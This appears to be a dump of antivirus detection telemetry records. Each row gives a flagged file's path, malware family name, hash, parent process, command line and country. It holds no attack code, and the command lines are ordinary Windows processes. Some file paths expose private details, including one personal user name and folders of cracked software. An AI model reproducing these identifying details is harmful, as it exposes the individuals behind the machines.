  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe201_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe201 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:19:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T19:32:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apd.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\APD\\APD.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='surat.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\SURAT\\SURAT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-103204-c2531992', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81885465\\AVSCAN-20181101-103108-BCD9A830\\AVSCAN-20181101-103204-C2531992', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:32:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='of duty.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Of Duty.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igfxzoom.exe', filepath='D:\\DriverePC\\CompaqEvoD51S\\Video_Intel_SP31099\\Win2000\\igfxzoom.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='ca2c82043df121296f1bb874bc9f239f2817a8c05e4e6250362f8890c53f99ea', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:18:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170448-338352e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a667259\\AVSCAN-20181101-170435-31A3DD08\\AVSCAN-20181101-170448-338352E9', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:36:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:22:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:25:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rsd_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\rsd_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='c198d2322c61bee515479fa52c310f610358c001a7527cf949eadfa14ecf6a38', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T12:37:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsd7FAA.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:03:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092518-c175b199', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e97d068\\AVSCAN-20181101-092410-B6C41C15\\AVSCAN-20181101-092518-C175B199', filesize=768000, name='TR/Dropper.Gen.#M1.#R1'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:25:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195043-c4059ab8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-194803-A89BA1A8\\AVSCAN-20181101-195043-C4059AB8', filesize=64000, name='TR/Agent.64000.118.#M1.#R1'), hash='881c0e605130cfd9eca8ca14e5402a53a6b365a579221d829f5d80cd7447bb51', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='\\\\?\\F:\\โปรเเกรมคอม 1\\โปรเเกรมทางด้านเอกสาร\\Microsoft Office 2003-2007-2010-2013 AIO + Crack\\autorun.exe', filesize=7232000, name='W32/Neshta.A.#M1.#R1'), hash='8d501d078233b52c9dd59bdb2d20ff2799bf3463e06619c419b7f58d961262c6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T06:02:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='6fc6e123109375b69e5e8a00ad949fc53433947bfc9551f2cef91c11c9afaf68', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T17:18:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall bts site manager.exe', filepath='\\\\?\\C:\\Program Files\\NSN\\Managers\\BTS Site\\BTS Site Manager\\Uninstall BTS Site Manager\\Uninstall BTS Site Manager.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='e7cdfc791589c9e0dd59f96a05734080e36b49b705bd1cca70b96460ec5f3fd8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:41:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-020219-71d55b11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb0bc277\\AVSCAN-20181102-020151-6D7B4572\\AVSCAN-20181102-020219-71D55B11', filesize=4992000, name='DR/Delphi.Gen.#M1.#R1'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:02:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='amazon cracker.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Portare nel Portatile\\Telegram\\Metodi\\Amazon\\Cracker\\Amazon Cracker.exe', filesize=44000, name='HEUR/APC.#M1.#R1'), hash='a2eef9413534657295fd481e24edd9de9d37c11fb9274d5708e717781e5c486d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmpnssci.dll', filepath='C:\\Program Files\\Windows Media Player\\wmpnssci.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='59321160cdcfaed3e4c40c3e3b350d3f0d0fea2500d6f7053c432ba2adabf7d3', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crash_logs.exe', filepath='G:\\cmTransfer\\Log\\crash_logs.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:39:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111450-17caf9a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111450-17CAF9A3', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:33:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:02:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hw_tool_en.exe', filepath='D:\\7\\BackUp Files\\New Download\\Installer\\BOX\\MRT\\mrt_2.60_lastupdate\\date\\hw_tool_en.exe', filesize=6272000, name='W32/Sality.AG.#M1.#R1'), hash='3c307435a70ea686152da6c601dd435255c539e0fca58d372f5bf484f3871a8c', metadata=Row(cmdline='\\\\\\/onboot', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-01T02:19:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005240-0c3ce1a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235744-2DA07E8C\\AVSCAN-20181102-005240-0C3CE1A2', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0002344.exe', filepath='\\\\?\\K:\\System Volume Information\\_restore{5C5E2F10-B8E0-4A14-BDD0-47C56E2C74BA}\\RP3\\A0002344.exe', filesize=512000, name='W32/Neshta.A.#M1.#R1'), hash='0e6fed5d2b10fb14e333114439d8b26a6ba8722b4d984d9a048371a30662d14d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3708.23888\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3708.23888\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T23:25:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:53:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002917-64a4cff8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002917-64A4CFF8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215010-d6a4fc6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e8942c23\\AVSCAN-20181101-214228-937D9B6E\\AVSCAN-20181101-215010-D6A4FC6C', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:50:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002351-11373676', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235744-2DA07E8C\\AVSCAN-20181102-002351-11373676', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:23:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='back .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\001\\back\\back .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='3679ffa307f0d1a5f135e23d57a51ae780ebb4f8492d846d0306cdd07b1fc358', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:34:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181103-005146-048f3561', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0676114b\\AVSCAN-20181103-004831-E7F528C3\\AVSCAN-20181103-005146-048F3561', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ws582e9975-bc7a-421e-bcd9-200060710b63.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Photoshop\\10.0\\WS582E9975-BC7A-421e-BCD9-200060710B63.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='7fc6d717a0bfd1cbeccc0e44d4200922b5c245bcc1c5265d29f03d86bef6d5e5', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:21:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:22:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0124810.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0124810.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:41:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-100059-d823bd02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea3339be\\AVSCAN-20181101-100026-D54BBF50\\AVSCAN-20181101-100059-D823BD02', filesize=1544000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='45a08b358ad83527c3b2407bbba2c5b56f04a2f9ba0b5e2c331538aac3fda062', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:00:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addcat.exe', filepath='D:\\pc drivers\\DP_Sound_Creative_13101 pult out\\Creative\\WinAll\\CR7\\wdm\\common\\i386\\Addcat.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='129167f89f0a98d9095d11686d3feb493266212b75d76673fcfdae103c6dd216', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:30:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='11d5167e9542b2084638bfee2e987fe11f2201a4f746161fd3879aed097607ab', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T02:54:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\uTorrentDir\\mSiExEc64.ExE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:53:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:28:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T09:59:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-173550-b831dbbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-173550-B831DBBF', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:35:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\uq5bad23y3p\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T13:47:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150902-f438238e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150902-F438238E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:09:08Z'), dt=datetime.date(2018, 11, 1)),
